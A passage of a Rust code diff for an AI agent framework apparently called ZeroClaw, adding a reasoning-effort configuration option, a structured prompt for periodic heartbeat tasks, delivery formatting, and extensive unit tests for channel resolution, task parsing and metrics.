.or_else(|_| std::env::var("ZEROCLAW_CODEX_REASONING_EFFORT"))
{
match normalize_reasoning_effort(&raw) {
Ok(effort) => self.runtime.reasoning_effort = Some(effort),
Err(message) => tracing::warn!("Ignoring reasoning effort env override: {message}"),
}
}
// Web search enabled: ZEROCLAW_WEB_SEARCH_ENABLED or WEB_SEARCH_ENABLED
if let Ok(enabled) = std::env::var("ZEROCLAW_WEB_SEARCH_ENABLED")
.or_else(|_| std::env::var("WEB_SEARCH_ENABLED"))
@@ -7870,6 +8190,7 @@ default_temperature = 0.7
assert!(c.cli);
assert!(c.telegram.is_none());
assert!(c.discord.is_none());
assert!(!c.show_tool_calls);
}
// ── Serde round-trip ─────────────────────────────────────
@@ -8007,6 +8328,7 @@ default_temperature = 0.7
notion: NotionConfig::default(),
node_transport: NodeTransportConfig::default(),
knowledge: KnowledgeConfig::default(),
linkedin: LinkedInConfig::default(),
};
let toml_str = toml::to_string_pretty(&config).unwrap();
@@ -8201,6 +8523,32 @@ reasoning_enabled = false
assert_eq!(parsed.runtime.reasoning_enabled, Some(false));
}
#[test]
async fn runtime_reasoning_effort_deserializes() {
let raw = r#"
default_temperature = 0.7
[runtime]
reasoning_effort = "HIGH"
"#;
let parsed: Config = toml::from_str(raw).unwrap();
assert_eq!(parsed.runtime.reasoning_effort.as_deref(), Some("high"));
}
#[test]
async fn runtime_reasoning_effort_rejects_invalid_values() {
let raw = r#"
default_temperature = 0.7
[runtime]
reasoning_effort = "turbo"
"#;
let error = toml::from_str::<Config>(raw).expect_err("invalid value should fail");
assert!(error.to_string().contains("reasoning_effort"));
}
#[test]
async fn agent_config_defaults() {
let cfg = AgentConfig::default();
@@ -8312,6 +8660,7 @@ tool_dispatcher = "xml"
notion: NotionConfig::default(),
node_transport: NodeTransportConfig::default(),
knowledge: KnowledgeConfig::default(),
linkedin: LinkedInConfig::default(),
};
config.save().await.unwrap();
@@ -10181,6 +10530,31 @@ default_model = "legacy-model"
std::env::remove_var("ZEROCLAW_REASONING_ENABLED");
}
#[test]
async fn env_override_reasoning_effort() {
let _env_guard = env_override_lock().await;
let mut config = Config::default();
assert_eq!(config.runtime.reasoning_effort, None);
std::env::set_var("ZEROCLAW_REASONING_EFFORT", "HIGH");
config.apply_env_overrides();
assert_eq!(config.runtime.reasoning_effort.as_deref(), Some("high"));
std::env::remove_var("ZEROCLAW_REASONING_EFFORT");
}
#[test]
async fn env_override_reasoning_effort_legacy_codex_env() {
let _env_guard = env_override_lock().await;
let mut config = Config::default();
std::env::set_var("ZEROCLAW_CODEX_REASONING_EFFORT", "minimal");
config.apply_env_overrides();
assert_eq!(config.runtime.reasoning_effort.as_deref(), Some("minimal"));
std::env::remove_var("ZEROCLAW_CODEX_REASONING_EFFORT");
}
#[test]
async fn env_override_invalid_port_ignored() {
let _env_guard = env_override_lock().await;
+313 -7
View File
@@ -359,7 +359,8 @@ async fn run_heartbeat_worker(config: Config) -> Result<()> {
let mut tick_had_error = false;
for task in &tasks_to_run {
let task_start = std::time::Instant::now();
let prompt = format!("[Heartbeat Task | {}] {}", task.priority, task.text);
let prompt =
HeartbeatEngine::build_task_prompt(task, config.heartbeat.prompt_prefix.as_deref());
let temp = config.default_temperature;
match Box::pin(crate::agent::run(
config.clone(),
@@ -370,7 +371,7 @@ async fn run_heartbeat_worker(config: Config) -> Result<()> {
vec![],
false,
None,
None,
config.heartbeat.allowed_tools.clone(),
))
.await
{
@@ -390,11 +391,7 @@ async fn run_heartbeat_worker(config: Config) -> Result<()> {
duration_ms,
config.heartbeat.max_run_history,
);
let announcement = if output.trim().is_empty() {
format!("💓 heartbeat task completed: {}", task.text)
} else {
output
};
let announcement = HeartbeatEngine::format_delivery_output(&output, task);
if let Some((channel, target)) = &delivery {
if let Err(e) = crate::cron::scheduler::deliver_announcement(
&config,
@@ -784,6 +781,315 @@ mod tests {
assert!(target.is_none());
}
// ── resolve_heartbeat_delivery edge cases ─────────────────
#[test]
fn resolve_delivery_whitespace_only_target() {
let mut config = Config::default();
config.heartbeat.target = Some(" ".into());
config.heartbeat.to = Some("123".into());
// Whitespace target → treated as None → (None, Some) → error
let err = resolve_heartbeat_delivery(&config).unwrap_err();
assert!(err.to_string().contains("heartbeat.target is required"));
}
#[test]
fn resolve_delivery_whitespace_only_to() {
let mut config = Config::default();
config.heartbeat.target = Some("telegram".into());
config.heartbeat.to = Some(" ".into());
// Whitespace to → treated as None → (Some, None) → error
let err = resolve_heartbeat_delivery(&config).unwrap_err();
assert!(err.to_string().contains("heartbeat.to is required"));
}
#[test]
fn resolve_delivery_both_whitespace() {
let mut config = Config::default();
config.heartbeat.target = Some(" ".into());
config.heartbeat.to = Some(" ".into());
// Both whitespace → (None, None) → auto-detect → None (no channels)
let result = resolve_heartbeat_delivery(&config).unwrap();
assert!(result.is_none());
}
// ── auto_detect_heartbeat_channel edge cases ────────────────
#[test]
fn auto_detect_telegram_empty_allowed_users() {
let mut config = Config::default();
config.channels_config.telegram = Some(crate::config::TelegramConfig {
bot_token: "token".into(),
allowed_users: vec![],
stream_mode: crate::config::StreamMode::default(),
draft_update_interval_ms: 1000,
interrupt_on_new_message: false,
mention_only: false,
});
// No users → target would be empty → returns None
let result = auto_detect_heartbeat_channel(&config);
assert!(result.is_none());
}
#[test]
fn auto_detect_discord_only() {
let mut config = Config::default();
config.channels_config.discord = Some(crate::config::DiscordConfig {
bot_token: "token".into(),
guild_id: None,
allowed_users: vec!["user".into()],
listen_to_bots: false,
mention_only: false,
});
// Discord requires explicit target
let result = auto_detect_heartbeat_channel(&config);
assert!(result.is_none());
}
#[test]
fn auto_detect_telegram_priority_over_discord() {
let mut config = Config::default();
config.channels_config.telegram = Some(crate::config::TelegramConfig {
bot_token: "token".into(),
allowed_users: vec!["tg_user".into()],
stream_mode: crate::config::StreamMode::default(),
draft_update_interval_ms: 1000,
interrupt_on_new_message: false,
mention_only: false,
});
config.channels_config.discord = Some(crate::config::DiscordConfig {
bot_token: "token".into(),
guild_id: None,
allowed_users: vec!["disc_user".into()],
listen_to_bots: false,
mention_only: false,
});
let result = auto_detect_heartbeat_channel(&config);
assert_eq!(
result,
Some(("telegram".to_string(), "tg_user".to_string()))
);
}
// ── validate_heartbeat_channel_config edge cases ────────────
#[test]
fn validate_channel_case_insensitive() {
let mut config = Config::default();
config.channels_config.telegram = Some(crate::config::TelegramConfig {
bot_token: "token".into(),
allowed_users: vec![],
stream_mode: crate::config::StreamMode::default(),
draft_update_interval_ms: 1000,
interrupt_on_new_message: false,
mention_only: false,
});
// "Telegram" with uppercase T should pass
assert!(validate_heartbeat_channel_config(&config, "Telegram").is_ok());
}
#[test]
fn validate_channel_unsupported() {
let config = Config::default();
let err = validate_heartbeat_channel_config(&config, "whatsapp").unwrap_err();
assert!(err.to_string().contains("unsupported"));
}
#[test]
fn validate_channel_not_configured() {
let config = Config::default();
let err = validate_heartbeat_channel_config(&config, "discord").unwrap_err();
assert!(err.to_string().contains("not configured"));
}
#[test]
fn validate_channel_slack_not_configured() {
let config = Config::default();
let err = validate_heartbeat_channel_config(&config, "slack").unwrap_err();
assert!(err.to_string().contains("slack"));
assert!(err.to_string().contains("not configured"));
}
#[test]
fn validate_channel_mattermost_not_configured() {
let config = Config::default();
let err = validate_heartbeat_channel_config(&config, "mattermost").unwrap_err();
assert!(err.to_string().contains("mattermost"));
assert!(err.to_string().contains("not configured"));
}
#[test]
fn validate_channel_empty_string() {
let config = Config::default();
let err = validate_heartbeat_channel_config(&config, "").unwrap_err();
assert!(err.to_string().contains("unsupported"));
}
#[test]
fn validate_channel_telegram_configured_ok() {
let mut config = Config::default();
config.channels_config.telegram = Some(crate::config::TelegramConfig {
bot_token: "token".into(),
allowed_users: vec![],
stream_mode: crate::config::StreamMode::default(),
draft_update_interval_ms: 1000,
interrupt_on_new_message: false,
mention_only: false,
});
assert!(validate_heartbeat_channel_config(&config, "telegram").is_ok());
}
#[test]
fn validate_channel_discord_configured_ok() {
let mut config = Config::default();
config.channels_config.discord = Some(crate::config::DiscordConfig {
bot_token: "token".into(),
guild_id: None,
allowed_users: vec![],
listen_to_bots: false,
mention_only: false,
});
assert!(validate_heartbeat_channel_config(&config, "discord").is_ok());
}
// ── auto_detect_heartbeat_channel additional edge cases ──────
#[test]
fn auto_detect_slack_only() {
let mut config = Config::default();
config.channels_config.slack = Some(crate::config::schema::SlackConfig {
bot_token: "token".into(),
app_token: Some("app".into()),
channel_id: None,
allowed_users: vec!["user".into()],
interrupt_on_new_message: false,
});
// Slack requires explicit target
let result = auto_detect_heartbeat_channel(&config);
assert!(result.is_none());
}
#[test]
fn auto_detect_mattermost_only() {
let mut config = Config::default();
config.channels_config.mattermost = Some(crate::config::schema::MattermostConfig {
url: "https://mm.example.com".into(),
bot_token: "token".into(),
channel_id: None,
allowed_users: vec!["user".into()],
thread_replies: None,
mention_only: None,
});
// Mattermost requires explicit target
let result = auto_detect_heartbeat_channel(&config);
assert!(result.is_none());
}
#[test]
fn auto_detect_telegram_multiple_users_picks_first() {
let mut config = Config::default();
config.channels_config.telegram = Some(crate::config::TelegramConfig {
bot_token: "token".into(),
allowed_users: vec!["first_user".into(), "second_user".into()],
stream_mode: crate::config::StreamMode::default(),
draft_update_interval_ms: 1000,
interrupt_on_new_message: false,
mention_only: false,
});
let result = auto_detect_heartbeat_channel(&config);
assert_eq!(
result,
Some(("telegram".to_string(), "first_user".to_string()))
);
}
// ── resolve_heartbeat_delivery additional edge cases ─────────
#[test]
fn resolve_delivery_empty_string_target() {
let mut config = Config::default();
config.heartbeat.target = Some(String::new());
config.heartbeat.to = Some("123".into());
// Empty string target → trimmed to empty → filtered to None → (None, Some) → error
let err = resolve_heartbeat_delivery(&config).unwrap_err();
assert!(err.to_string().contains("heartbeat.target is required"));
}
#[test]
fn resolve_delivery_empty_string_to() {
let mut config = Config::default();
config.heartbeat.target = Some("telegram".into());
config.heartbeat.to = Some(String::new());
// Empty string to → trimmed to empty → filtered to None → (Some, None) → error
let err = resolve_heartbeat_delivery(&config).unwrap_err();
assert!(err.to_string().contains("heartbeat.to is required"));
}
#[test]
fn resolve_delivery_both_empty_strings() {
let mut config = Config::default();
config.heartbeat.target = Some(String::new());
config.heartbeat.to = Some(String::new());
// Both empty → (None, None) → auto-detect → None
let result = resolve_heartbeat_delivery(&config).unwrap();
assert!(result.is_none());
}
#[test]
fn resolve_delivery_discord_configured() {
let mut config = Config::default();
config.heartbeat.target = Some("discord".into());
config.heartbeat.to = Some("channel-id".into());
config.channels_config.discord = Some(crate::config::DiscordConfig {
bot_token: "token".into(),
guild_id: None,
allowed_users: vec![],
listen_to_bots: false,
mention_only: false,
});
let result = resolve_heartbeat_delivery(&config).unwrap();
assert_eq!(
result,
Some(("discord".to_string(), "channel-id".to_string()))
);
}
#[test]
fn resolve_delivery_slack_configured() {
let mut config = Config::default();
config.heartbeat.target = Some("slack".into());
config.heartbeat.to = Some("C123456".into());
config.channels_config.slack = Some(crate::config::schema::SlackConfig {
bot_token: "token".into(),
app_token: Some("app".into()),
channel_id: None,
allowed_users: vec![],
interrupt_on_new_message: false,
});
let result = resolve_heartbeat_delivery(&config).unwrap();
assert_eq!(result, Some(("slack".to_string(), "C123456".to_string())));
}
#[test]
fn resolve_delivery_mattermost_configured() {
let mut config = Config::default();
config.heartbeat.target = Some("mattermost".into());
config.heartbeat.to = Some("chan-id".into());
config.channels_config.mattermost = Some(crate::config::schema::MattermostConfig {
url: "https://mm.example.com".into(),
bot_token: "token".into(),
channel_id: None,
allowed_users: vec![],
thread_replies: None,
mention_only: None,
});
let result = resolve_heartbeat_delivery(&config).unwrap();
assert_eq!(
result,
Some(("mattermost".to_string(), "chan-id".to_string()))
);
}
/// Verify that SIGHUP does not cause shutdown — the daemon should ignore it
/// and only terminate on SIGINT or SIGTERM.
#[cfg(unix)]
+1
View File
@@ -370,6 +370,7 @@ pub async fn run_gateway(host: &str, port: u16, config: Config) -> Result<()> {
zeroclaw_dir: config.config_path.parent().map(std::path::PathBuf::from),
secrets_encrypt: config.secrets.encrypt,
reasoning_enabled: config.runtime.reasoning_enabled,
reasoning_effort: config.runtime.reasoning_effort.clone(),
provider_timeout_secs: Some(config.provider_timeout_secs),
extra_headers: config.extra_headers.clone(),
api_path: config.api_path.clone(),
+793 -1
View File
@@ -323,6 +323,66 @@ impl HeartbeatEngine {
(priority, status)
}
/// Build a structured, non-conversational prompt for Phase 2 task execution.
pub fn build_task_prompt(task: &HeartbeatTask, prompt_prefix: Option<&str>) -> String {
let mut prompt = String::new();
if let Some(prefix) = prompt_prefix {
prompt.push_str(prefix);
prompt.push_str("\n\n");
}
use std::fmt::Write;
let _ = write!(
prompt,
"You are executing a periodic automated task. You are NOT in a conversation.\n\n\
## Task\n{}\n\n\
## Priority\n{}\n\n\
## Instructions\n\
- Execute this task using available tools (shell, file_read, memory, browser, etc.)\n\
- Report results as a structured brief\n\
- Format:\n\
\x20 **Status:** [completed | partial | failed]\n\
\x20 **Summary:** [1-2 sentences]\n\
\x20 **Details:** [bullet points of findings/actions]\n\
\x20 **Next action:** [follow-up or \"none\"]\n\
- Do NOT greet, ask questions, or use conversational filler\n\
- Be direct and factual\n\n\
## Memory\n\
- Use memory_search to check previous findings for this task\n\
- Use memory_store to save important findings for future ticks",
task.text, task.priority
);
prompt
}
/// Format raw agent output for channel delivery.
///
/// Prepends a header, handles empty output, and truncates for safety.
pub fn format_delivery_output(raw: &str, task: &HeartbeatTask) -> String {
const MAX_DELIVERY_CHARS: usize = 4096;
let header = format!("[{}] {}", task.priority, task.text);
let body = raw.trim();
let body = if body.is_empty() {
"Task completed (no output)"
} else {
body
};
let mut output = format!("{header}\n\n{body}");
if output.len() > MAX_DELIVERY_CHARS {
// Truncate at a char boundary
let mut cutoff = MAX_DELIVERY_CHARS;
while cutoff > 0 && !output.is_char_boundary(cutoff) {
cutoff -= 1;
}
output.truncate(cutoff);
}
output
}
/// Build the Phase 1 LLM decision prompt for two-phase heartbeat.
pub fn build_decision_prompt(tasks: &[HeartbeatTask]) -> String {
let mut prompt = String::from(
@@ -344,7 +404,8 @@ impl HeartbeatEngine {
"\nRespond with ONLY one of:\n\
- `run: 1,2,3` (comma-separated task numbers to execute)\n\
- `skip` (nothing needs to run right now)\n\n\
Be conservative skip if tasks are routine and not time-sensitive.",
Be conservative skip if tasks are routine and not time-sensitive.\n\n\
Do not explain your reasoning. Respond with ONLY the directive.",
);
prompt
@@ -850,4 +911,735 @@ mod tests {
let metrics = engine.metrics();
assert_eq!(metrics.lock().total_ticks, 0);
}
// ── Malformed metadata parsing edge cases ───────────────────
#[test]
fn parse_meta_empty_brackets() {
let tasks = HeartbeatEngine::parse_tasks("- [] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "Task");
}
#[test]
fn parse_meta_pipe_only() {
let tasks = HeartbeatEngine::parse_tasks("- [|] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "Task");
}
#[test]
fn parse_meta_high_pipe_empty() {
let tasks = HeartbeatEngine::parse_tasks("- [high|] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::High);
assert_eq!(tasks[0].status, TaskStatus::Active);
}
#[test]
fn parse_meta_pipe_paused() {
let tasks = HeartbeatEngine::parse_tasks("- [|paused] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Paused);
}
#[test]
fn parse_meta_unknown_tag() {
let tasks = HeartbeatEngine::parse_tasks("- [unknown] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "Task");
}
#[test]
fn parse_meta_case_insensitive() {
let tasks = HeartbeatEngine::parse_tasks("- [HIGH|PAUSED] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::High);
assert_eq!(tasks[0].status, TaskStatus::Paused);
}
#[test]
fn parse_task_line_unclosed_bracket() {
let tasks = HeartbeatEngine::parse_tasks("- [high Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "[high Task");
}
#[test]
fn parse_task_line_nested_brackets() {
let tasks = HeartbeatEngine::parse_tasks("- [high] [extra] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::High);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "[extra] Task");
}
#[test]
fn parse_task_line_metadata_empty_text_after_trim() {
// When text after bracket is empty/whitespace, falls back to plain text
let tasks = HeartbeatEngine::parse_tasks("- [high] ");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "[high]");
}
#[test]
fn parse_meta_multiple_pipes() {
let tasks = HeartbeatEngine::parse_tasks("- [high|active|low] Task");
assert_eq!(tasks.len(), 1);
// Last priority wins: high then low → low
assert_eq!(tasks[0].priority, TaskPriority::Low);
assert_eq!(tasks[0].status, TaskStatus::Active);
}
// ── Decision response parsing edge cases ────────────────────
#[test]
fn parse_decision_empty_response() {
let indices = HeartbeatEngine::parse_decision_response("", 3);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_run_with_extra_spaces() {
let indices = HeartbeatEngine::parse_decision_response("run: 1 , 2 , 3 ", 5);
assert_eq!(indices, vec![0, 1, 2]);
}
#[test]
fn parse_decision_run_space_variant() {
let indices = HeartbeatEngine::parse_decision_response("run 1,2", 5);
assert_eq!(indices, vec![0, 1]);
}
#[test]
fn parse_decision_all_out_of_range() {
let indices = HeartbeatEngine::parse_decision_response("run: 99,100", 3);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_verbose_skip() {
// "I think we should skip" doesn't start with "skip" exactly,
// parse as bare numbers fails → empty (documents limitation)
let indices = HeartbeatEngine::parse_decision_response("I think we should skip", 3);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_verbose_run_buried() {
// "Based on analysis, run: 1,2" — bare number parse picks up "2" from
// comma-split, so this partially works (documents limitation).
let indices = HeartbeatEngine::parse_decision_response("Based on analysis, run: 1,2", 3);
// Only "2" parses as a valid number from the comma-split fragments
assert_eq!(indices, vec![1]);
}
// ── Metrics edge cases ──────────────────────────────────────
#[test]
fn metrics_ema_zero_duration() {
let mut m = HeartbeatMetrics::default();
m.record_success(0.0);
assert!(!m.avg_tick_duration_ms.is_nan());
assert_eq!(m.avg_tick_duration_ms, 0.0);
}
#[test]
fn metrics_ema_very_large_duration() {
let mut m = HeartbeatMetrics::default();
m.record_success(f64::MAX / 2.0);
assert!(!m.avg_tick_duration_ms.is_infinite());
assert!(!m.avg_tick_duration_ms.is_nan());
}
#[test]
fn metrics_concurrent_access() {
let metrics = Arc::new(ParkingMutex::new(HeartbeatMetrics::default()));
let threads: Vec<_> = (0..4)
.map(|i| {
let m = Arc::clone(&metrics);
std::thread::spawn(move || {
for _ in 0..100 {
let mut lock = m.lock();
if i % 2 == 0 {
lock.record_success(1.0);
} else {
lock.record_failure(1.0);
}
}
})
})
.collect();
for t in threads {
t.join().unwrap();
}
assert_eq!(metrics.lock().total_ticks, 400);
}
#[test]
fn adaptive_interval_large_failure_count() {
// consecutive_failures=20 → saturating_mul shouldn't overflow
let result = compute_adaptive_interval(30, 5, 120, 20, false);
assert!(result <= 120);
assert!(result >= 5);
}
// ── build_task_prompt tests ─────────────────────────────────
#[test]
fn build_task_prompt_contains_task_text() {
let task = HeartbeatTask {
text: "Check email inbox".into(),
priority: TaskPriority::High,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("Check email inbox"));
}
#[test]
fn build_task_prompt_contains_no_greeting_instruction() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("Do NOT greet"));
}
#[test]
fn build_task_prompt_contains_structured_format() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("**Status:**"));
assert!(prompt.contains("**Summary:**"));
assert!(prompt.contains("**Details:**"));
assert!(prompt.contains("**Next action:**"));
}
#[test]
fn build_task_prompt_with_custom_prefix() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Low,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, Some("CUSTOM PREFIX"));
assert!(prompt.starts_with("CUSTOM PREFIX"));
assert!(prompt.contains("Task"));
}
// ── format_delivery_output tests ────────────────────────────
#[test]
fn format_delivery_output_adds_header() {
let task = HeartbeatTask {
text: "Check email".into(),
priority: TaskPriority::High,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output("Some result", &task);
assert!(output.starts_with("[high] Check email"));
assert!(output.contains("Some result"));
}
#[test]
fn format_delivery_output_handles_empty() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output(" ", &task);
assert!(output.contains("Task completed (no output)"));
}
#[test]
fn format_delivery_output_truncates_long_output() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let long = "x".repeat(5000);
let output = HeartbeatEngine::format_delivery_output(&long, &task);
assert!(output.len() <= 4096);
}
// ── parse_meta alias coverage ───────────────────────────────
#[test]
fn parse_meta_med_alias() {
let tasks = HeartbeatEngine::parse_tasks("- [med] Task");
assert_eq!(tasks[0].priority, TaskPriority::Medium);
}
#[test]
fn parse_meta_pause_alias() {
let tasks = HeartbeatEngine::parse_tasks("- [pause] Task");
assert_eq!(tasks[0].status, TaskStatus::Paused);
}
#[test]
fn parse_meta_complete_alias() {
let tasks = HeartbeatEngine::parse_tasks("- [complete] Task");
assert_eq!(tasks[0].status, TaskStatus::Completed);
}
#[test]
fn parse_meta_done_alias() {
let tasks = HeartbeatEngine::parse_tasks("- [done] Task");
assert_eq!(tasks[0].status, TaskStatus::Completed);
}
#[test]
fn parse_meta_whitespace_around_pipes() {
let tasks = HeartbeatEngine::parse_tasks("- [ high | paused ] Task");
assert_eq!(tasks[0].priority, TaskPriority::High);
assert_eq!(tasks[0].status, TaskStatus::Paused);
}
#[test]
fn parse_task_line_whitespace_inside_brackets() {
let tasks = HeartbeatEngine::parse_tasks("- [ ] Task");
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "Task");
}
// ── parse_tasks line ending / whitespace edge cases ─────────
#[test]
fn parse_tasks_crlf_line_endings() {
let content = "- Task A\r\n- Task B\r\n- Task C";
let tasks = HeartbeatEngine::parse_tasks(content);
assert_eq!(tasks.len(), 3);
assert_eq!(tasks[0].text, "Task A");
assert_eq!(tasks[2].text, "Task C");
}
#[test]
fn parse_tasks_consecutive_empty_lines() {
let content = "- A\n\n\n\n- B";
let tasks = HeartbeatEngine::parse_tasks(content);
assert_eq!(tasks.len(), 2);
}
#[test]
fn parse_tasks_whitespace_only_lines() {
let content = "- A\n \n\t\n- B";
let tasks = HeartbeatEngine::parse_tasks(content);
assert_eq!(tasks.len(), 2);
}
// ── parse_decision_response additional edge cases ────────────
#[test]
fn parse_decision_task_count_zero() {
let indices = HeartbeatEngine::parse_decision_response("run: 1", 0);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_uppercase_run() {
// Input gets lowercased, so "RUN: 1,2" → "run: 1,2"
let indices = HeartbeatEngine::parse_decision_response("RUN: 1,2", 3);
assert_eq!(indices, vec![0, 1]);
}
#[test]
fn parse_decision_uppercase_skip() {
let indices = HeartbeatEngine::parse_decision_response("SKIP", 3);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_duplicate_indices() {
let indices = HeartbeatEngine::parse_decision_response("run: 1,1,1", 3);
assert_eq!(indices, vec![0, 0, 0]);
}
#[test]
fn parse_decision_negative_numbers() {
let indices = HeartbeatEngine::parse_decision_response("run: -1,2", 3);
// "-1" fails to parse as usize → filtered out; "2" parses fine
assert_eq!(indices, vec![1]);
}
#[test]
fn parse_decision_decimal_numbers() {
let indices = HeartbeatEngine::parse_decision_response("run: 1.5,2", 3);
// "1.5" fails to parse as usize → filtered; "2" works
assert_eq!(indices, vec![1]);
}
#[test]
fn parse_decision_whitespace_only() {
let indices = HeartbeatEngine::parse_decision_response(" ", 3);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_run_colon_no_numbers() {
let indices = HeartbeatEngine::parse_decision_response("run: ", 3);
assert!(indices.is_empty());
}
// ── compute_adaptive_interval boundary conditions ────────────
#[test]
fn adaptive_base_zero() {
// base=0 → clamped to [min, max]
let result = compute_adaptive_interval(0, 5, 120, 0, false);
assert_eq!(result, 5);
}
#[test]
#[should_panic(expected = "assertion failed: min <= max")]
fn adaptive_min_greater_than_max_panics() {
// min > max → clamp panics (documents Rust stdlib behavior)
compute_adaptive_interval(30, 120, 5, 0, false);
}
#[test]
fn adaptive_min_equals_max_equals_base() {
let result = compute_adaptive_interval(30, 30, 30, 0, false);
assert_eq!(result, 30);
}
#[test]
fn adaptive_failures_u64_max() {
// u64::MAX failures → should not panic; capped at shift=10
let result = compute_adaptive_interval(30, 5, 120, u64::MAX, false);
assert!(result <= 120);
assert!(result >= 5);
}
#[test]
fn adaptive_high_priority_with_min_below_five() {
// min=2 but high priority enforces >= 5
let result = compute_adaptive_interval(30, 2, 120, 0, true);
assert_eq!(result, 5);
}
#[test]
fn adaptive_high_priority_with_min_above_five() {
let result = compute_adaptive_interval(30, 10, 120, 0, true);
assert_eq!(result, 10);
}
#[test]
fn adaptive_failure_backoff_exactly_at_max() {
// 2 failures: 30 * 4 = 120 exactly at max
let result = compute_adaptive_interval(30, 5, 120, 2, false);
assert_eq!(result, 120);
}
// ── Metrics additional edge cases ───────────────────────────
#[test]
fn metrics_ema_nan_input() {
let mut m = HeartbeatMetrics::default();
m.record_success(f64::NAN);
// NaN propagates in EMA; verify no panic
assert!(m.avg_tick_duration_ms.is_nan());
}
#[test]
fn metrics_ema_negative_duration() {
let mut m = HeartbeatMetrics::default();
m.record_success(-50.0);
// Negative is accepted without panic
assert_eq!(m.avg_tick_duration_ms, -50.0);
}
#[test]
fn metrics_interleaved_success_failure() {
let mut m = HeartbeatMetrics::default();
m.record_success(10.0);
assert_eq!(m.consecutive_successes, 1);
assert_eq!(m.consecutive_failures, 0);
m.record_failure(20.0);
assert_eq!(m.consecutive_successes, 0);
assert_eq!(m.consecutive_failures, 1);
m.record_success(30.0);
assert_eq!(m.consecutive_successes, 1);
assert_eq!(m.consecutive_failures, 0);
m.record_failure(40.0);
m.record_failure(50.0);
assert_eq!(m.consecutive_successes, 0);
assert_eq!(m.consecutive_failures, 2);
assert_eq!(m.total_ticks, 5);
}
#[test]
fn metrics_default_values() {
let m = HeartbeatMetrics::default();
assert_eq!(m.uptime_secs, 0);
assert_eq!(m.consecutive_successes, 0);
assert_eq!(m.consecutive_failures, 0);
assert!(m.last_tick_at.is_none());
assert_eq!(m.avg_tick_duration_ms, 0.0);
assert_eq!(m.total_ticks, 0);
}
// ── build_task_prompt additional tests ───────────────────────
#[test]
fn build_task_prompt_embeds_priority() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::High,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("## Priority\nhigh"));
}
#[test]
fn build_task_prompt_embeds_low_priority() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Low,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("## Priority\nlow"));
}
#[test]
fn build_task_prompt_contains_memory_instructions() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("memory_search"));
assert!(prompt.contains("memory_store"));
}
#[test]
fn build_task_prompt_contains_not_in_conversation() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("NOT in a conversation"));
}
#[test]
fn build_task_prompt_empty_prefix() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, Some(""));
// Empty prefix still prepends the "\n\n" separator
assert!(prompt.starts_with("\n\n"));
}
#[test]
fn build_task_prompt_unicode_task() {
let task = HeartbeatTask {
text: "日本語タスク 📧".into(),
priority: TaskPriority::High,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("日本語タスク 📧"));
}
// ── format_delivery_output additional tests ─────────────────
#[test]
fn format_delivery_output_newline_only_raw() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output("\n\n\n", &task);
assert!(output.contains("Task completed (no output)"));
}
#[test]
